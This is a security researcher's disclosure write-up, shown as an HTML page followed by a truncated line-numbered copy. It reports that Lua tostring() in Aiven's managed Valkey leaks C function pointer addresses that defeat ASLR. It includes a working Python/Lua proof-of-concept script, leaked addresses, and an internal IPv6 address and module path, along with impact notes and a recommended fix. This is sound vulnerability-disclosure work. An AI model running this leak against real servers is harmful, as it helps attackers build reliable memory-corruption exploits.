security-research-notebook/valkey-aslr-leak/index.html

283 lines · html

<!doctype html>
<html lang="en"><head><meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey | Zion Boggan</title>
<meta name="description" content="ASLR leak through replication metadata.">
<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
<style>
  :root{
    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
    --line:#222936; --line2:#2c3543;
    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
    --accent:#6cc7b8; --accent-dim:#274b47;
    --maxw:1020px;
  }
  *{box-sizing:border-box;}
  html{scroll-behavior:smooth;}
  body{margin:0;background:var(--bg);color:var(--ink);
    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
  a{color:var(--accent);text-decoration:none;}
  a:hover{color:#8fe0d2;}
  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
 
  /* nav */
  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
  nav .brand{font-weight:600;letter-spacing:.2px;}
  nav .brand .dot{color:var(--accent);}
  nav .links{display:flex;gap:26px;font-size:13.5px;}
  nav .links a{color:var(--muted);}
  nav .links a:hover{color:var(--ink);}
  @media(max-width:680px){nav .links{display:none;}}
 
  /* hero */
  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
    display:flex;align-items:center;gap:9px;margin-bottom:20px;}
  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
  .hero .lede b{color:var(--ink);font-weight:600;}
  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
  .btn.primary:hover{background:#8fe0d2;color:#06231f;}
  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
  .meta .mono{color:var(--faint);}
 
  /* sections */
  section{padding:64px 0;border-bottom:1px solid var(--line);}
  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
  .shead .rule{flex:1;height:1px;background:var(--line);}
 
  /* flagship */
  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
  .flag .top{padding:30px 32px 8px;}
  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
  .flag p{color:var(--soft);margin:0 0 16px;}
  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}
  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
  .spec li:first-child{border-top:none;}
  .spec li span{color:var(--muted);}
  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
 
  /* lab cards */
  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
  @media(max-width:680px){.cards{grid-template-columns:1fr;}}
  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
  .card h3{margin:0 0 9px;font-size:17px;}
  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
    border-radius:5px;padding:3px 8px;}
  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
  .card .lnk::after{content:" →";}
 
  /* research */
  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
    padding:18px 22px;border-top:1px solid var(--line);}
  .ritem:first-child{border-top:none;}
  .ritem:hover{background:var(--panel);}
  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
  .ritem h3{margin:0 0 3px;font-size:16px;}
  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}
  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
  .progs{margin-top:22px;}
  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}
  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
    border-radius:6px;padding:4px 10px;}
 
  /* credentials */
  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
  @media(max-width:680px){.cred{grid-template-columns:1fr;}}
  .cred p{color:var(--soft);margin:0 0 14px;}
  .cred .role{font-size:14px;color:var(--muted);}
  .cred .role b{color:var(--ink);font-weight:600;}
  .certs{list-style:none;margin:0;padding:0;}
  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
    display:flex;gap:10px;align-items:baseline;}
  .certs li:first-child{border-top:none;}
  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
 
  footer{padding:46px 0 64px;}
  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
 
  .detail-hero{padding:40px 0 26px;}
  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
  .back:hover{color:var(--ink);}
  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
  .content{padding:8px 0 0;max-width:840px;}
  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
  .content p{color:var(--soft);margin:0 0 15px;}
  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
  .content li{margin:5px 0;}
  .content strong{color:var(--ink);font-weight:600;}
  .content a{color:var(--accent);}
  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
  /* notebook index */
  .nbgroup{margin:40px 0 0;}
  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .nbtable tr{border-top:1px solid var(--line);}
  .nbtable tr:first-child{border-top:none;}
  .nbtable tr:hover{background:var(--panel);}
  .nbtable td{padding:14px 16px;vertical-align:top;}
  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
  .nbtable .ti a{font-weight:600;color:var(--ink);}
  .nbtable .ti a:hover{color:var(--accent);}
  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
</style>
<link rel="canonical" href="https://zionboggan.com/security-research-notebook/valkey-aslr-leak/">
<meta name="author" content="Zion Boggan">
<meta name="robots" content="index, follow, max-image-preview:large">
<meta property="og:type" content="article">
<meta property="og:site_name" content="Zion Boggan">
<meta property="og:title" content="ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey | Zion Boggan">
<meta property="og:description" content="ASLR leak through replication metadata.">
<meta property="og:url" content="https://zionboggan.com/security-research-notebook/valkey-aslr-leak/">
<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey | Zion Boggan">
<meta name="twitter:description" content="ASLR leak through replication metadata.">
<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey","description":"ASLR leak through replication metadata.","url":"https://zionboggan.com/security-research-notebook/valkey-aslr-leak/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
</head><body>
<nav><div class="wrap">
  <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
  <span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
</div></nav>
<header class="hero detail-hero"><div class="wrap">
  <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>
  <div class="kicker">Info disclosure</div>
  <h1>ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey</h1>
</div></header>
<section><div class="wrap"><div class="content">
<h2>Summary</h2>
<p>Any authenticated user on Aiven&rsquo;s managed Valkey service can leak heap/code segment memory addresses of the <code>valkey-server</code> process by calling <code>tostring()</code> on Lua function objects within an <code>EVAL</code> script. The <code>redis</code> and <code>server</code> tables in the Lua scripting environment expose 12+ C function pointers via their string representations (e.g., <code>function: 0x7f76122ca790</code>). These addresses defeat Address Space Layout Randomization (ASLR) for the server process.</p>
<p>While this is an information disclosure finding on its own, it directly enables exploitation of any memory corruption vulnerability (such as the previously reported RESTORE listpack assertion bug) by providing the attacker with precise memory layout information needed to build reliable exploits.</p>
<h2>Affected Target</h2>
<ul>
<li><strong>Service:</strong> Aiven for Valkey (Tier 1)</li>
<li><strong>Version tested:</strong> Valkey 8.1.4</li>
<li><strong>Instance:</strong> <host>:26161</li>
</ul>
<h2>Severity</h2>
<p><strong>P3, Information Disclosure</strong></p>
<p><strong>VRT:</strong> Server Security Misconfiguration &gt; Lack of Security Headers &gt; Information Disclosure</p>
<p><strong>CVSS 3.1:</strong> <code>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</code>, <strong>Score: 4.3 (Medium)</strong></p>
<h2>Steps to Reproduce</h2>
<pre><code class="language-python">import redis
 
r = redis.Redis(
    host=&quot;&lt;host&gt;&quot;, port=26161, username='default', password='&lt;password&gt;',
    ssl=True, ssl_cert_reqs='required',
    ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',
    decode_responses=True, socket_timeout=10
)
 
result = r.execute_command('EVAL', '''
    local ptrs = {}
    for k,v in pairs(redis) do
        if type(v) == &quot;function&quot; then
            ptrs[#ptrs+1] = k .. &quot;=&quot; .. tostring(v)
        end
    end
    table.sort(ptrs)
    return ptrs
''', 0)
 
for ptr in result:
    print(ptr)
</code></pre>
<p><strong>Actual output on Aiven:</strong></p>
<pre><code>acl_check_cmd=function: 0x7f76122ca790
breakpoint=function: 0x7f76122ca9a0
call=function: 0x7f76122ca2b0
debug=function: 0x7f76122ca8c0
error_reply=function: 0x7f76122ca580
log=function: 0x7f76122ca700
pcall=function: 0x7f76122ca310
register_function=function: 0x7f76122cab90
replicate_commands=function: 0x7f76122caa30
set_repl=function: 0x7f76122ca640
sha1hex=function: 0x7f76122ca430
status_reply=function: 0x7f76122ca4d0
</code></pre>
<p>These are actual virtual memory addresses of C functions in the <code>valkey-server</code> process. The addresses are in the <code>0x7f76122ca...</code> range, indicating they&rsquo;re in a dynamically loaded library segment, consistent with the Valkey executable or a loaded shared library.</p>
<h2>Impact</h2>
<ol>
<li>
<p><strong>ASLR defeat:</strong> Address Space Layout Randomization is the primary defense against memory corruption exploitation on modern Linux. Leaking function pointers reveals the base address of the code segment, allowing an attacker to calculate the address of any function or gadget.</p>
</li>
<li>
<p><strong>Exploitation enabler:</strong> Combined with any memory corruption primitive (buffer overflow, use-after-free, or assertion-reachable state), these addresses enable reliable ROP chain construction or function pointer overwrite attacks.</p>
</li>
<li>
<p><strong>Process-level information:</strong> The leaked addresses persist across multiple EVAL calls, confirming they belong to the long-running server process (not a sandboxed child). A server restart randomizes the addresses (confirmed via previous crash tests).</p>
</li>
<li>
<p><strong>Additional info leaked via other commands:</strong>, <code>CLIENT LIST</code> reveals internal IPv6 address: <code>fda7:a938:5bfe:5fa6:0:5a8:649:f83d</code>, <code>MODULE LIST</code> reveals module path: <code>/usr/valkey-8.1/usr/lib64/modules/libjson.so</code>, <code>HELLO</code> reveals internal server configuration, <code>os.clock()</code> via Lua reveals process CPU time (1038+ seconds)</p>
</li>
</ol>
<h2>Root Cause</h2>
<p>Valkey&rsquo;s Lua sandbox does not override the default <code>tostring()</code> behavior for C function objects. In standard Lua 5.1, <code>tostring()</code> on a C function returns <code>"function: 0x&lt;address&gt;"</code> where the address is the actual memory address of the C function. The sandbox should either:
- Override <code>tostring()</code> to return opaque identifiers for function objects
- Remove function pointer addresses from the string representation
- Block <code>tostring()</code> on the <code>redis</code>/<code>server</code> table entries</p>
<h2>Recommended Fix</h2>
<p>Patch the Lua sandbox to override <code>tostring()</code> for function values, returning a non-address identifier (e.g., <code>"function: redis.call"</code> instead of <code>"function: 0x7f76122ca2b0"</code>).</p>
<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/aiven/valkey-aslr-leak.md</p>
</div></div></section>
<footer><div class="wrap row">
  <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
  <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
</div></footer>
</body></html>

1	<!doctype html>
2	<html lang="en"><head><meta charset="utf-8">
3	<meta name="viewport" content="width=device-width, initial-scale=1.0">
4	<title>ASLR Bypass via Lua Function Pointer Leak in Aiven Managed Valkey \| Zion Boggan</title>
5	<meta name="description" content="ASLR leak through replication metadata.">
6	<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
7	<style>
8	:root{
9	--bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
10	--line:#222936; --line2:#2c3543;
11	--ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
12	--accent:#6cc7b8; --accent-dim:#274b47;
13	--maxw:1020px;
14	}
15	*{box-sizing:border-box;}
16	html{scroll-behavior:smooth;}
17	body{margin:0;background:var(--bg);color:var(--ink);
18	font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
19	font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
20	.mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
21	a{color:var(--accent);text-decoration:none;}
22	a:hover{color:#8fe0d2;}
23	.wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
24
25	/* nav */
26	nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
27	backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
28	nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
29	nav .brand{font-weight:600;letter-spacing:.2px;}
30	nav .brand .dot{color:var(--accent);}
31	nav .links{display:flex;gap:26px;font-size:13.5px;}
32	nav .links a{color:var(--muted);}
33	nav .links a:hover{color:var(--ink);}
34	@media(max-width:680px){nav .links{display:none;}}
35
36	/* hero */
37	header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
38	background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
39	.avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
40	display:flex;align-items:center;gap:9px;margin-bottom:20px;}
41	.avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
42	box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
43	@keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
44	h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
45	.hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
46	.hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
47	.hero .lede b{color:var(--ink);font-weight:600;}
48	.cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
49	.btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
50	font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
51	.btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
52	.btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
53	.btn.primary:hover{background:#8fe0d2;color:#06231f;}
54	.meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
55	.meta .mono{color:var(--faint);}
56
57	/* sections */
58	section{padding:64px 0;border-bottom:1px solid var(--line);}
59	.shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
60	.shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
61	.shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
62	.shead .rule{flex:1;height:1px;background:var(--line);}
63
64	/* flagship */
65	.flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
66	border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
67	.flag .top{padding:30px 32px 8px;}
68	.flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
69	.flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
70	.flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
71	.flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
72	.flag p{color:var(--soft);margin:0 0 16px;}
73	.flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
74	.stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
75	.stat .n{font-size:21px;font-weight:680;color:var(--ink);}
76	.stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
77	.spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
78	.spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
79	.spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
80	.spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
81	.spec li:first-child{border-top:none;}
82	.spec li span{color:var(--muted);}
83	.flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
84	@media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
85
86	/* lab cards */
87	.cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
88	@media(max-width:680px){.cards{grid-template-columns:1fr;}}
89	.card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
90	display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
91	.card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
92	.card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
93	.card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
94	.card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
95	.card h3{margin:0 0 9px;font-size:17px;}
96	.card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
97	.tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
98	.tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
99	border-radius:5px;padding:3px 8px;}
100	.card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
101	.card .lnk::after{content:" →";}
102
103	/* research */
104	.rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
105	.research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
106	.ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
107	padding:18px 22px;border-top:1px solid var(--line);}
108	.ritem:first-child{border-top:none;}
109	.ritem:hover{background:var(--panel);}
110	.ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
111	.ritem h3{margin:0 0 3px;font-size:16px;}
112	.ritem p{margin:0;font-size:13.5px;color:var(--muted);}
113	.ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
114	@media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
115	.progs{margin-top:22px;}
116	.progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
117	.progs .row{display:flex;flex-wrap:wrap;gap:7px;}
118	.progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
119	border-radius:6px;padding:4px 10px;}
120
121	/* credentials */
122	.cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
123	@media(max-width:680px){.cred{grid-template-columns:1fr;}}
124	.cred p{color:var(--soft);margin:0 0 14px;}
125	.cred .role{font-size:14px;color:var(--muted);}
126	.cred .role b{color:var(--ink);font-weight:600;}
127	.certs{list-style:none;margin:0;padding:0;}
128	.certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
129	display:flex;gap:10px;align-items:baseline;}
130	.certs li:first-child{border-top:none;}
131	.certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
132
133	footer{padding:46px 0 64px;}
134	footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
135	footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
136	footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
137
138	.detail-hero{padding:40px 0 26px;}
139	.back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
140	.back:hover{color:var(--ink);}
141	.kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
142	.detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
143	.detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
144	.facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
145	.content{padding:8px 0 0;max-width:840px;}
146	.content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
147	.content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
148	.content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
149	.content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
150	.content p{color:var(--soft);margin:0 0 15px;}
151	.content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
152	.content li{margin:5px 0;}
153	.content strong{color:var(--ink);font-weight:600;}
154	.content a{color:var(--accent);}
155	.content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
156	.content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
157	.content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
158	.content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
159	.content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
160	.content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
161	.content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
162	.content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
163	/* notebook index */
164	.nbgroup{margin:40px 0 0;}
